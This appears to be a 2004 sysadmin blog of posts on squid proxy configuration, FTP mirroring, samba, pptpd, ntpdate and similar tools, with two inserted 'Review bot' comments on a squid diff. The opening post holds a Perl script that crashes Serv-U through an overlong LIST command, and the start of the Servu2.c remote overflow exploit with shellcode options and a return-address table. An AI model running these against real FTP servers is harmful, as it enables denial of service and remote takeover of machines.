April 30, 2004
Serv-U: older versions are insecure, you need at least 5.0.0.4 or above 我爱网络
Serv-U exploit <= 5.0.0.4

1. crash cmd <= 5.0.0.4

LIST -l:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

-----> ServUCrashReport.txt
************ SERV-U DAEMON CRASH REPORT ************
Date: Thu Apr 29 17:18:24 2004
Version: Version 5.0 Build: 5.0.0.4
Reason: SERVUD~1.EXE caused a EXCEPTION_ACCESS_VIOLATION in module SERVUD~1.EXE at 001B:004238A3, _GetExceptDLLinfo()+141386 byte(s)
Registers:
EAX=06E2029B EBX=00E500E4 ECX=00000000 EDX=00000000 ESI=FFFFFFF0
EDI=00E500E4 EBP=012DB4F0 ESP=012DB3A4 EIP=004238A3 FLG=00010286
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000

-----> crash.pl
#!/usr/bin/perl
use IO::Socket;

$host = "ftp.domain.ip";
$port = "21";
$user = "username";
$pass = "password";

$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, );
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n";

while (<$remote>){ print $_; if (/220 /) { last; }}
$remote->autoflush(1);

my $ftp = "USER $user\r\n";
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>){ print $_; if (/331 /) { last; }}

$ftp = join("", "PASS ", "$pass", "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>){ print $_; if (/230 /) { last; }}

$ftp = join ("", "LIST -l:", "A"x(134), "\r\n");
print $remote $ftp;
print $ftp;
sleep(1);
while (<$remote>){ print $_; if (/250 Done/) { last; }}

close $remote;

2. exploit < 5.0.0.4

lion
lion@cnhonker.net
http://www.cnhonker.com

2004-02-28 [HUC] Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command Remote Exploit
    Servu2.c 20,889
2004-03-04 Serv-U Real Target and Search ASM Code Tool for Overflow Exploit.
    Servu2.c 21,756
    sac.cpp 12,848

-----> Servu2.c
/**-----------------------------------------------------------------------
 *
 * Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command
 *            Remote stack buffer overflow exploit
 *
 * Copyright (C) 2004 HUC All Rights Reserved.
 *
 * Author  : lion
 *         : lion@cnhonker.net
 *         : http://www.cnhonker.com
 * Date    : 2004-01-07
 * Update  : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug.
 *         : 2004-02-17 v7.0 Add Download url file and exec shellcode.
 *         : 2004-02-04 v6.1 Modified to work with UNIX.
 *         : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now.
 *         : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed.
 *         : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'.
 *         : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode.
 *         : 2004-01-13 v4.0 Can attack Serv-U 2.x.
 *         : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024)
 *         : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U 4.1.0.12
 *         : 2004-01-08 v2.0 Add connectback shellcode.
 *         : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11
 * Tested  : Windows 2000 Server EN/CN
 *         :   + Serv-U v3.0.0.16 ~ v5.0.0.3
 *         :   + Serv-U v2.5b, v2.5e, v2.5h, v2.5i, v2.5k
 *         : Windows XP EN/CN
 *         :   + Serv-U v4.x
 * Notice  : *** Bug found by bkbll (bkbll@cnhonker.net) 2004-01-07 ***
 *         : *** You need a valid account. include anonymous!!! ***
 *         : *** Private exploit! Don't distribute it!!! ***
 * Compile : On Windows
 *         :   cl Servu2.c
 *         : On UNIX
 *         :   gcc -o Servu2 Servu2.c -DUNIX
 * Usage   : e:\>Servu2
 *         : Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07)
 *         : Bug found by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)
 *         : Welcome to HUC website http://www.cnhonker.com
 *         : Usage: Servu2 -i <ip> [Options]
 *         :   -t Show All Target Type.
 *         :
 *         : [Options:]
 *         :   -i Target IP                  Required
 *         :   -t Target Type                Default: 0
 *         :   -u FTP Username               Default: ftp
 *         :   -p FTP Password               Default: ftp@ftp.com
 *         :   -f Port of the FTP Server     Default: 21
 *         :   -s Port of the Shell          Default: 53
 *         :   -c Connect back IP            For connectback shellcode
 *         :   -d Download the URL and Exec  Start with 'http://' or 'ftp://'
 *------------------------------------------------------------------------*/

#ifndef UNIX
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#pragma comment(lib, "ws2_32")
#else
#define uint32_t DWORD
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <errno.h>
#define closesocket(val) close(val)
#define SOCKET unsigned int
#define SOCKADDR_IN struct sockaddr_in
#define BOOL unsigned int
#define TRUE 1
#define FALSE 0
#define INVALID_SOCKET -1
#define SOCKET_ERROR -1
#define USHORT unsigned int
#define Sleep usleep
#define __leave goto exit_try
#define _snprintf snprintf
typedef struct sockaddr* LPSOCKADDR;
#endif

#ifdef UNIX
int GetLastError() { return errno;}
int WSAGetLastError() { return errno;}
#endif

#define MAX_LEN 2048
#define SEH_OFFSET 48-1
#define JMP_OVER "\xeb\x06\xeb\x06"
#define VERSION "7.0"

// for rebind shellcode
#define BIND_OFFSET 113

// for connectback shellcode
#define PORT_OFFSET 95
#define IP_OFFSET 88

// default parameter
#define SHELLPORT 53
#define FTPPORT 21
#define DEFTYPE 0
#define DEFUSER "ftp"
#define DEFPASS "ftp@ftp.com"

// for Serv-U 2.x
#define READ_ADDR "\x01\x01\xfd\x7f"
#define READ_OFFSET 5+14+12

struct
{
 DWORD dwJMP;
 char *szDescription;
}
targets[] =
{
 {0x7801D07B,"Serv-U 3.x/4.x/5.x ALL 2K SP3/SP4"},        //msvcrt.dll pop,pop,ret addr
// {0x78010394,"Serv-U 3.x/4.x/5.x ALL 2K SP4"},          //msvcrt.dll pop,pop,ret addr
 {0x77c22ca7,"Serv-U 3.x/4.x/5.x ALL XP SP1"},            //msvcrt.dll pop,pop,ret addr
// {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"},    //pop,pop,ret addr for all CN win2000,winxp,win2003
 {0x7ffa1571,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"},      //pop,pop,ret addr for all CN win2000,winxp,win2003
 {0x7ffa1c1b,"Serv-U 3.x/4.x/5.x EN 2K/XP/2K3 ALL"},      //pop,pop,ret addr for all EN win2000,winxp,win2003
 {0x7ffae617,"Serv-U 3.x/4.x/5.x TW 2K/XP/2K3 ALL"},      //pop,pop,ret addr for all TW win2000,winxp,win2003
// {0x7ffa2186,"Serv-U 3.x/4.x/5.x TW 2K ALL"},           //jmp ebx addr for all TW win2000
 {0x7ffa4a1b,"Serv-U 3.x/4.x/5.x KR 2K ALL"},             //jmp ebx addr for all KR win2000
 {0x7ffa4512,"Serv-U 2.x >= 2.5i CN 2K/XP/2K3 ALL"},      //jmp esp addr for all CN win2000,winxp,win2003
 {0x7ffa4512,"Serv-U 2.x <= 2.5h CN 2K/XP/2K3 ALL"},      //jmp esp addr for all CN win2000,winxp,win2003
 {0x7ffa24ce,"Serv-U 2.x >= 2.5i TW 2K/XP/2K3 ALL"},      //jmp esp addr for all TW win2000,winxp,win2003
 {0x7ffa24ce,"Serv-U 2.x <= 2.5h TW 2K/XP/2K3 ALL"},      //jmp esp addr for all TW win2000,winxp,win2003
 {0x7ffa82a4,"Serv-U 2.x >= 2.5i KR 2K/XP/2K3 ALL"},      //call esp addr for all KR win2000,winxp,win2003
 {0x7ffa82a4,"Serv-U 2.x <= 2.5h KR 2K/XP/2K3 ALL"},      //call esp addr for all KR win2000,winxp,win2003

Posted by windtear at 1:45 AM
April 29, 2004
HoeKey - a tiny but extremely powerful hotkey utility
Click to download: HoeKeyA12b4.zip
http://bcheck.arsware.org/hoe.php
http://bcheck.arsware.org/HoeKeyA12b4.zip
http://bcheck.arsware.org/HoeKeyA12b4Inst.exe
http://bcheck.arsware.org/hoekey.htm

Saw it recommended by a netizen this afternoon and tried it. So powerful, I was stunned.

From: Machael (Special Striving For), Board: NewSoftware
Subject: Highly recommended: a super easy-to-use, super powerful hotkey program
Site: BBS 水木清华站 (Thu Apr 29 14:41:07 2004), local

Preface:
It is tiny (13k), yet powerful. It is portable ("green"), yet completely free. It takes the little bit of application interface that M$ left us and wields it masterfully, producing super setups where one key does it all. Is it the incarnation of a god, or an envoy from hell? Nobody knows, but one thing is certain: everyone gives it the same title: Hoe~Key!

Look at what I have set up with its hotkeys:
win+F12: TC
win+F11: FlashFXP
win+F10: MyIE
win+N: Notepad
win+end: minimize the current window to the tray
win+home: restore the last hidden window
win+Y: show the copyable text of the current window
win+S: cmd.exe in the current directory
win+~: turn off the monitor
win+K: kill the current process
win+up: maximize the current window
win+down: restore the current window
.....

The hoekey.ini in the package is my own setup; it is enough for most people. If it is not satisfying enough, you can restore the default ini that ships with it. More advanced settings require reading the help; you won't know how powerful it is until you look. Recommended, recommended, and recommended again!

-----> hoekey.ini
; HoeKey config - example from a12b4
;
; key modifiers:
; ~=windows, _=shift, ^=ctrl, @=alt
;
; some general good stuff
-=Rem|-- General --
~Q=Config
~end=Hide||1 ; win+end: hide current window
~_end=Hide||2 ; win+end: hide current window
~home=Unhide

Posted by windtear at 8:03 PM
SquidNT - Squid 2.5 for Windows NT 4.0/2000/XP/2003
-----> homepage
http://www.acmeconsulting.it/pagine/opensource/squid/squidnt25.htm

Squid 2.5 for Windows NT 4.0/2000/XP/2003
Native port of Squid 2.5, with many NT service enhancements.

Current features:
 - Based on Squid 2.5 STABLE 5
 - Runs as a native Windows NT Service
 - Currently supported build environments: Microsoft Visual C++ 6.0 SP5, MSYS + MinGW, Cygwin
 - Multiple Squid service instances are allowed
 - Full command line support when running as a service
 - Automatic Service

Posted by windtear at 3:15 PM
April 28, 2004
squid ipcn.pac use URLHash2 of SPS(Super Proxy Script) - remove ipcnauth
The ipcn proxy temporarily drops authentication and adds cache selection based on the requested URL. Nobody needs to change anything; just set the automatic configuration script. Off for the holiday first.

 http_access deny tolib
-http_access allow tothu fromthu ipcnauth
+http_access allow tothu fromthu
 http_access deny tothu
-http_access allow ipcnauth !porn
+http_access allow !porn
 http_access deny all

-if(isPlainHostName(host) || dnsDomainIs(host,".cn")) return "DIRECT";
+//if(isPlainHostName(host) || dnsDomainIs(host,".cn")) return "DIRECT";
+if(isPlainHostName(host)) return "DIRECT";
-else return "PROXY proxy2.ipcn.org:PORT";
+else {
+ var n = URLhash2(url) % 5;
+ if (n < 4) return "PROXY proxy2.ipcn.org:PORT; PROXY proxy.ipcn.org:PORT; DIRECT";
+ if (n < 5) return "PROXY proxy.ipcn.org:PORT;

Posted by windtear at 7:32 PM
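Review bot: dropping `ipcnauth` from the two allow rules in the squid.conf hunk turns `http_access allow !porn` into an allow for every client that reaches the proxy and is not already denied by the `tolib`/`tothu` rules above it, so unless an earlier `src` ACL limits the client networks this makes the proxy an open proxy for everything except porn URLs; keep a source restriction on that line while authentication is off, for example `http_access allow fromthu !porn`, so that `deny all` still applies to the outside world.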
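Review bot: in the PAC hunk the second test `if (n < 5)` is always true once `n < 4` has failed, because `URLhash2(url) % 5` is in 0..4, so it should be the plain fallback return rather than a conditional; also, commenting out the `dnsDomainIs(host,".cn")` check means .cn hosts no longer go DIRECT but through the proxies, which changes the old behaviour and should be stated in the change note. The hunk is cut off after `PROXY proxy.ipcn.org:PORT;`, so the remainder of that fallback chain and the closing brace are not visible here.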
ntpdate time synchronization & date usage
% rpm -Uvh ./disk1/RedHat/RPMS/libcap-1.10-8.i386.rpm
% rpm -Uvh ./disk1/RedHat/RPMS/ntp-4.1.1-1.i386.rpm
% ntpdate clock.cuhk.edu.hk
28 Apr 01:15:39 ntpdate[3990]: no server suitable for synchronization found

http://www.time.edu.cn
http://www.time.edu.cn/download/ntp-4.2.0.tar.gz

% ntpdate s1a.time.edu.cn
28 Apr 01:10:14 ntpdate[3928]: step time server 202.112.10.60 offset 1.134021 sec

-----> http://www.time.edu.cn/mem.htm
CERNET time service structure
The first tier consists of 4 core nodes: Tsinghua, BUPT, Peking University and Southeast University. The second tier gets its time directly from the first tier. The third tier gets its time only from second-tier nodes. Tier-N servers have the domain names sN[a-z].time.edu.cn.

CERNET time service provider list [ view the status of each server ]

CERNET's first- and second-tier time servers are already up. To provide the most convenient and accurate time service, we hope that regional and provincial nodes will run third-tier servers to serve their local networks. Join our time service network!

Tier  Domain name      Location                                             Contact  Email                 Phone
1     s1a.time.edu.cn  Beijing University of Posts and Telecommunications   王振华   wzhdl at bupt.edu.cn  010-62283044-8003
1     s1b.time.edu.cn  Tsinghua University                                  李艳玲   liyl02

Posted by windtear at 1:19 AM
squid cache_peer access log analysis crontab demo
# proxy
59 23 * * * /opt/old_access/squid-log.sh.new.sh
0 0 * * * /opt/old_access/cron.squid.autodeny.sh
5 0 * * * /opt/old_access/squid-log.sh.new.sh.step2.sh

# proxy2
59 23 * * * /opt/old_access/squid-log.sh.new.sh
0 0 * * * /opt/old_access/cron.squid.autodeny.sh

# proxy
-----> /opt/old_access/squid-log.sh.new.sh
NOW_DATE=$(date +%Y%m%d)
killall tail
/opt/old_access/generate.currentdeny.squid.from.iptables.sh
/sbin/iptables -F squid
/bin/mv -f $OLD_ACCESS/access.log $OLD_ACCESS/access.log.bak
/usr/sbin/squid -k rotate

# proxy
-----> /opt/old_access/squid-log.sh.new.sh.step2.sh
NOW_DATE=$(date --date=yesterday +%Y%m%d)
cd $OLD_ACCESS
wget http://proxy2/_old_log_/access.log.bak.$NOW_DATE.gz
[[ -f $OLD_ACCESS/access.log.bak.$NOW_DATE.gz ]] && zcat access.log.bak.$NOW_DATE.gz >> access.log.bak && rm -f access.log.bak.$NOW_DATE.gz
/opt/old_access/pwebstats -c /opt/old_access/squid-proxy.conf
/bin/mv -f $OLD_ACCESS/access.log.bak $OLD_ACCESS/access.log.bak.$NOW_DATE
/bin/gzip $OLD_ACCESS/access.log.bak.$NOW_DATE

# proxy
# proxy2
-----> /opt/old_access/cron.squid.autodeny.sh
DATE=$(date +%Y%m%d)
cd /opt/old_access
mv squid.deny _old_deny_/squid.deny.$DATE
mv squid.deny.log _old_deny_/squid.deny.log.$DATE
tail -f /opt/old_access/access.log | /opt/old_access/autodeny.pl

# proxy2
-----> /opt/old_access/squid-log.sh.new.sh
NOW_DATE=$(date +%Y%m%d)
killall tail
/sbin/iptables -F squid
/bin/mv -f $OLD_ACCESS/access.log $OLD_ACCESS/_old_log_/access.log.bak.$NOW_DATE
/usr/sbin/squid -k rotate
gzip $OLD_ACCESS/_old_log_/access.log.bak.$NOW_DATE

Posted by windtear at 12:59 AM
April 27, 2004
lftp - my fav & some mirror method - ncftp wget rsync
% rpm -qi lftp
Name        : lftp                              Relocations: (not relocateable)
Version     : 2.4.9                                  Vendor: Red Hat, Inc.
Release     : 2                                  Build Date: Wed 10 Dec 2003 12:47:55 AM CST
Install date: Tue 23 Dec 2003 01:43:56 AM CST      Build Host: bugs.devel.redhat.com
Group       : Applications/Internet              Source RPM: lftp-2.4.9-2.src.rpm
Size        : 1734259                               License: GPL
Packager    : Red Hat, Inc. <http://bugzilla.redhat.com/bugzilla>
URL         : http://lftp.yar.ru/
Summary     : A sophisticated file transfer program
Description :
LFTP is a sophisticated ftp/http file transfer program. Like bash, it has job control and uses the readline library for input. It has bookmarks, built-in mirroring, and can transfer several files in parallel. It is designed with reliability in mind.

% lftp -h
Usage: lftp [OPTS] <site>
`lftp' is the first command executed by lftp after rc files
 -f <file>           execute commands from the file and exit
 -c <cmd>            execute the commands and exit
 --help              print this help and exit
 --version           print lftp version and exit
Other options are the same as in `open' command
 -e <cmd>            execute the command just after selecting
 -u <user>[,<pass>]  use the user/password for authentication
 -p <port>           use the port for connection
 <site>              host name, URL or bookmark name

% more /etc/lftp.conf
## some useful aliases
alias dir ls
alias less more
alias zless zmore
alias bzless bzmore
alias l "ls -l"
alias lm "ls -l | more"
alias lt "ls -ltr"
alias ltm "ls -ltr | more"
alias d3 "debug 3"
set net:reconnect-interval-base 1
set net:reconnect-interval-max 1
set net:reconnect-interval-multiplier 1
set net:max-retries 4
## make prompt look better
#set prompt "lftp \u\@\h:\w> "
set prompt "ftp://\u\@\h\w > "

% man lftp
NAME
 lftp - Sophisticated file transfer program
SYNTAX
 lftp [-d] [-e cmd] [-p port] [-u user[,pass]] [site]
 lftp -f script_file
 lftp -c commands
 lftp --version
 lftp --help
VERSION
 This man page documents lftp version 2.4.0.
 On startup, lftp executes /etc/lftp.conf and then ~/.lftprc and ~/.lftp/rc. You can place aliases and `set' commands there. Some people prefer to see full protocol debug, use `debug' to turn the debug on. Use `debug 3' to see only greeting messages and error messages.

!ls
rels
debug 3
queue wait 0
queue get filename.ext
queue -d 3
mirror dir/
mirror -R dir_to_be_uploaded
get filename.ext -o newfilename.newext
get -c filename.exe
open ftp://user:pass@dns.server.ip:port/
user username
jobs
w
ctrl z
get filename.ext &
pget -n bigfilename.ext
mirror -c --parallel=n dir/
bookmark add bmname
bookmark edit
du -sh
mget -c ftp://fxpsite1/filename.ext ftp://fxpsite2/newfilename.newext

-----> some mirror method
From: windtear (风中之珠), Board: Service
Subject: Several ways to mirror
Site: HAPPY (Fri Apr 27 16:46:47 2001)

wget
ncftpget
I use these two the most.

example:
wget -q -b -c -m -nr --tries=0 --wait=120 --timeout=120 ftp://166.111.215.36/incoming/_starw_/discovery/
wget -q -b -c -m -nr -nd --tries=0 --wait=120 --timeout=120 ftp://166.111.146.88:21/f:/FTP/Pub/RM/永不瞑目/
ncftpget -b -R -P 1021 ftp.sparrows.dhs.org . /pub/Movie/鉴证实录II
ncftpget -u *** -p *** -b -R 166.111.168.21 . /射雕英雄传/压好的RM/铁血丹心
rsync -r ftp.ns-lab.com::ftp/incoming/_starw_/discovery .

Of course, after starting ncftp or lftp you can also use & or Ctrl+z followed by bg.
--
※ Source: .HAPPY bbs.happynet.org. [FROM: 166.111.168.21]

i like rsync :P
rsync -rvutoglpD

Posted by windtear at 10:27 PM
April 26, 2004
netfilter/iptables nat PREROUTING REDIRECT to work around the mail server port binding lock
Actually I should have written this a few days earlier.

From: windtear (Are You Happy?!), Board: Linux
Subject: Re: I temporarily used iptables to solve the ××××/smtpd port...
Site: ××××BBS (Wed Apr 21 2004 11:23:46), local mail

assp bind 125
smtpd bind 25

iptables -t nat -I PREROUTING 1 -s ! 127.0.0.1 -p tcp --dport 25 -j REDIRECT --to-ports 125

In the assp configuration, assp.cfg:
listenPort:=125
smtpDestination:=127.0.0.1:25

-----> antispam assp (qmail) - Anti-Spam SMTP Proxy (ASSP)
AntiSpam - C/R System - TMDA - wle - anti-spam
my attempt with 2 mail and 1 bbs

Posted by windtear at 10:23 PM
April 25, 2004
pptpd PoPToP ppp - a simple sample of vpn
% cat /etc/pptpd.conf
speed 115200
option /etc/ppp/options.pptpd
localip 172.16.162.105
remoteip 172.16.162.106-254

% cat /etc/ppp/options.pptpd
lock
name pptpd
auth
nodefaultroute
noproxyarp
+chap
+chapms
+chapms-v2

% pptpd -v
PoPToP v1.1.4-b4

% rpm -qi ppp
Name        : ppp                               Relocations: (not relocateable)
Version     : 2.4.1                                  Vendor: (none)
Release     : 3mppe                              Build Date: Fri 08 Feb 2002 08:39:32 PM CST
Install date: Sun 25 Apr 2004 02:27:05 PM CST      Build Host: opennms.linvision.intern
Group       : System Environment/Daemons         Source RPM: ppp-2.4.1-3mppe.src.rpm
Size        : 390504                                License: distributable
Summary     : The PPP (Point-to-Point Protocol) daemon.
Description :
The ppp package contains the PPP (Point-to-Point Protocol) daemon and documentation for PPP support. The PPP protocol provides a method for transmitting datagrams over serial point-to-point links. PPP is usually used to dial in to an ISP (Internet Service Provider) or other organization over a modem and phone line.

% cd /etc/ppp; rename ip orig.ip ip*
% modprobe ppp
% pptpd -fd

% pptpd -h
PoPToP v1.1.4-b4
The PPTP Server for Linux
Usage: pptpd [options], where options are:

 [-c] [--conf file]         Specifies the config file to read default settings from (default is /etc/pptpd.conf).
 [-d] [--debug]             Turns on debugging (to syslog).
 [-f] [--fg]                Run in foreground.
 [-h] [--help]              Displays this help message.
 [-l] [--listen x.x.x.x]    Specifies IP of local interface to listen to.
 [-o] [--option file]       Specifies the PPP options file to use (default is /etc/ppp/options).
 [-p] [--pidfile file]      Specifies the file to write the process ID to (default is /var/run/pptpd.pid).
 [-s] [--speed baud]        Specifies the baud speed for the PPP daemon (default is 115200).
 [-t] [--stimeout seconds]  Specifies the timeout for the first packet. This is a DOS protection (default is 10).
 [-v] [--version]           Displays the PoPToP version number.

Logs and debugging go to syslog as DAEMON.

Command line options will override any default settings and any settings specified in the config file (default config file: /etc/pptpd.conf).

Posted by windtear at 4:18 PM
SMB Network Neighborhood (网上邻居 / 网邻) samba@linux net@windows
-----> samba - linux smb server
% cat smb.conf
[global]
 netbios name = windtear
 workgroup = WORKGROUP
 server string = linux smb server
 #socket address = 10.35.0.253
 #hosts allow = 127. 10.35.
 #hosts deny = all
 #inherit permissions = yes
 create mask = 0664
 directory mask = 0775
 log file = /var/log/samba/log.%I
 max log size = 50
 password level = 8
 encrypt passwords = yes
 smb passwd file = /etc/samba/smbpasswd
 socket options = TCP_NODELAY SO_RCVBUF=8192 SO_SNDBUF=8192
 dns proxy = no

[homes]
 comment = Home Directories
 path = /home/%u
 browseable = no
 writable = yes

[_ROOT_]
 comment = _ROOT_
 path = /
 guest ok = No
 read only = No
 browseable = No
 valid users = root
 write list = root

-----> windows client
% net use X: "\\172.16.162.105\DIR" password /USER:user
% net use X: /DELETE
% net use \\172.16.162.105\ipc$ /delete
\\172.16.162.105\ipc$ 已经删除。
%

-----> smb init.d no NMBD
#!/bin/sh
#
# chkconfig: - 91 35
# description: Starts and stops the Samba smbd daemons \
#              used to provide SMB network services.
#
# pidfile: /var/cache/samba/smbd.pid
# config:  /etc/samba/smb.conf

# Source function library.
if [ -f /etc/init.d/functions ] ; then
  . /etc/init.d/functions
elif [ -f /etc/rc.d/init.d/functions ] ; then
  . /etc/rc.d/init.d/functions
else
  exit 0
fi

# Avoid using root's TMPDIR
unset TMPDIR

# Source networking configuration.
. /etc/sysconfig/network

if [ -f /etc/sysconfig/samba ]; then
  . /etc/sysconfig/samba
fi

# Check that networking is up.
[ ${NETWORKING} = "no" ] && exit 0

# Check that smb.conf exists.
[ -f /etc/samba/smb.conf ] || exit 0

RETVAL=0

start() {
  KIND="SMB"
  echo -n $"Starting $KIND services: "
  daemon smbd $SMBDOPTIONS
  RETVAL=$?
  echo
  [ $RETVAL -eq 0 ] && touch /var/lock/subsys/smb || \
    RETVAL=1
  return $RETVAL
}

stop() {
  KIND="SMB"
  echo -n $"Shutting down $KIND services: "
  killproc smbd
  RETVAL=$?
  echo
  [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/smb
  echo ""
  return $RETVAL
}

restart() {
  stop
  start
}

reload() {
  echo -n $"Reloading smb.conf file: "
  killproc smbd -HUP
  RETVAL=$?
  echo
  return $RETVAL
}

rhstatus() {
  status smbd
}

case "$1" in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    restart
    ;;
  reload)
    reload
    ;;
  status)
    rhstatus
    ;;
  condrestart)
    [ -f /var/lock/subsys/smb ] && restart || :
    ;;

Posted by windtear at 4:17 PM
April 23, 2004
[IPCN] Taking part in the Challenge Cup, 2004-04-24 17:00, west tennis courts of the Comprehensive Gymnasium
Everyone is welcome to visit the Mechanical Engineering department's exhibition tent (the "helmet"). Three IPCN systems will be introduced there:
 - IPCN proxy system (proxy.ipcn.org)
 - IPCN domain name system (domain.ipcn.org)
 - IPCN search system (search.ipcn.org)

Posted by windtear at 4:45 PM
April 21, 2004
antispam assp (qmail) - Anti-Spam SMTP Proxy (ASSP)
http://assp.sourceforge.net

ASSP Documentation
The Anti-Spam SMTP Proxy (ASSP) Server is an open source, platform-independent SMTP Proxy server which implements whitelists and Bayesian filtering to rid the planet of the blight of unsolicited email (UCE). UCE must be stopped at the SMTP server. Anti-spam tools must be adaptive to new spam and customized for each site's mail patterns. This free, easy-to-use tool works

Posted by windtear at 2:09 AM
April 20, 2004
我爱网络
Current status:
1. ssh -> linux screen bbs
2. ppp -> linux pptpd - not free ip
   ppp -> windows rras - smb
3. rdp -> windows file misc + kill vmware
   rdp -> windows
4. pcanywhere -> windows start vmware gsx server
   bug here: no shift no ctrl+all -> so goto 3 kill :( so 5 remote console
5. vmware remote console -> vmware gsx server
   just iso test

andie -> file://e:/ipcn.pac
cmd -> windump -n ...

Posted by windtear at 12:19 AM
April 19, 2004
mkisofs demo
-----> demo
# sample of mkisofs-1.15a40.tgz (mkisofs 1.15a40 +gbk +md5)
mkisofs -o /cdr/dsk3.iso -no-emul-boot -eltorito-boot loader.bin -hide-rr-moved -hide loader.bin -hide-joliet loader.bin -hide boot.catalog -hide-joliet boot.catalog -V "WinXPPro" -copyright "Microsoft China" -J -O -R -N -l -relaxed-filenames -gbk4dos-filenames -gbk4win-filenames /cdr/boot /cdr/root /cdr/dsk1 /cdr/dsk2 /cdr/dsk3

# mine
mkisofs -o e:\windows01.v0.004.iso -no-emul-boot -eltorito-boot LOADER.BIN -hide-rr-moved -hide LOADER.BIN -hide-joliet LOADER.BIN -hide boot.catalog -hide-joliet boot.catalog -V "Windows3in1" -copyright "Microsoft China"

Posted by windtear at 11:35 PM
April 18, 2004
Sophos sweep IDE update script - Download the IDE file - demo
#!/bin/sh
# Script for Sophos Sweep by Reiner Keller
#
# For Sophos, see also http://www.sophos.com/support/faqs/autodown.html
# ("How to automate the downloading of IDE files").
#cd /usr/lib/sophos
cd /usr/local/sav
/usr/bin/wget -q -N `/usr/bin/sweep -v |/bin/grep "Product version" |/bin/sed -e "s/.*: \(.\)\.\(..\)$/ http:\/\/www.sophos.com\/downloads\/ide\/\1\2_ides.zip/"`
/usr/bin/unzip -q -n "???_ides.zip"
rm -f *_ides.zip
chmod 644 *

@ http://phst.ph.mahidol.ac.th/Linux/software/sophos.cron

126297 Apr 17 12:09 380_ides.zip
% unzip -l /opt/soft/380_ides.zip
Archive:  /opt/soft/380_ides.zip
  Length     Date   Time    Name
 --------    ----   ----

Posted by windtear at 6:10 PM
Windows Integrated & Combination Installation - Nin1 - QChain.exe/Qfecheck.exe
-----> QChain.exe (old1)
http://support.microsoft.com/?kbid=296861
Microsoft Knowledge Base Article - 296861
How to install multiple Windows updates or hotfixes with only one reboot

Summary
This article describes how to install multiple Windows product updates (for example, critical updates, security patches or hotfixes) that use Hotfix.exe (Microsoft Windows NT 4.0) or Update.exe (Microsoft Windows 2000, Microsoft Windows XP or Microsoft Windows Server 2003) with only one reboot. This article is intended for administrators and IT professionals. You can install Windows product updates that use Hotfix.exe or Update.exe on their own, or install Windows (with or without a service pack) together with Windows product updates that use Hotfix.exe or Update.exe. Note: the procedure described in this article does not apply to product updates that do not use Hotfix.exe or Update.exe as their installer. For example, Internet Explorer updates for Windows NT 4.0, Windows 2000 and Windows XP use INF-based

Posted by windtear at 12:24 AM
April 17, 2004
squid filter - blacklist of squidguard
An ultrafast and free filter, redirector and access controller for Squid (http://www.squid-cache.org/)
http://www.squidguard.org/
Tue Dec 18 2001: squidGuard-1.2.0 has been released!
http://www.squidguard.org/blacklist/
http://ftp.teledanmark.no/pub/www/proxy/squidGuard/contrib/blacklists.tar.gz
ftp://ftp.teledanmark.no/pub/www/proxy/squidGuard/contrib/blacklists.tar.gz

-----> README
!!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!
!!!                                                                         !!!
!!! These blacklists are entirely products of a dumb robot (squidGuardRobot) !!!
!!! We recommend that you review the lists before using them.               !!!
!!! Don't blame us if there are mistakes, but please report errors          !!!
!!! with the online tool at http://www.squidguard.org/blacklist/            !!!
!!!                                                                         !!!
!!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!

-----> domains
#
# !!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!
#
# This list is entirely a product of a dumb robot (squidGuardRobot-2.3.7).
# We strongly recommend that you review the lists before using them!
# Don't blame us if there are mistakes, but please report errors with
# the online tool at http://www.squidguard.org/blacklist/
#
# !!! WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING !!!
#
# This list was compiled in 313:58:55 on 2004.04.16 03:48:09.
# This list was compiled from 985 link sources and 1615446 links,
# of which 98135 tested successfully.
#

!! squidGuard itself is not used here; its blacklist is just copied into an acl url_regex !!

From: windtear ( 死磕论文 ), Board: NetResources
Subject: Re: [Announcement] Filtering on my proxy has been strengthened
Site: BBS 水木清华站 (Sat Apr 17 17:10:59 2004), forwarded

.....
"/etc/squid/porn/domains"
# this is an old one                               Modify: Mon Sep 13 20:39:33 1999
# @ 1852737 Dec 18 2001 squidGuard-1.2.0.tar.gz
# the new one is too big, I did not dare to use it Modify: Fri Apr 16 10:03:15 2004
#
"/etc/squid/porn/expressions"
# this one is the (most) recent                    Modify: Mon Jun 17 19:03:22 2002

!! Attention here: 255 bytes limit in "file" line ... acl ... ... "file" !!

http_access allow ipcnauth !porn
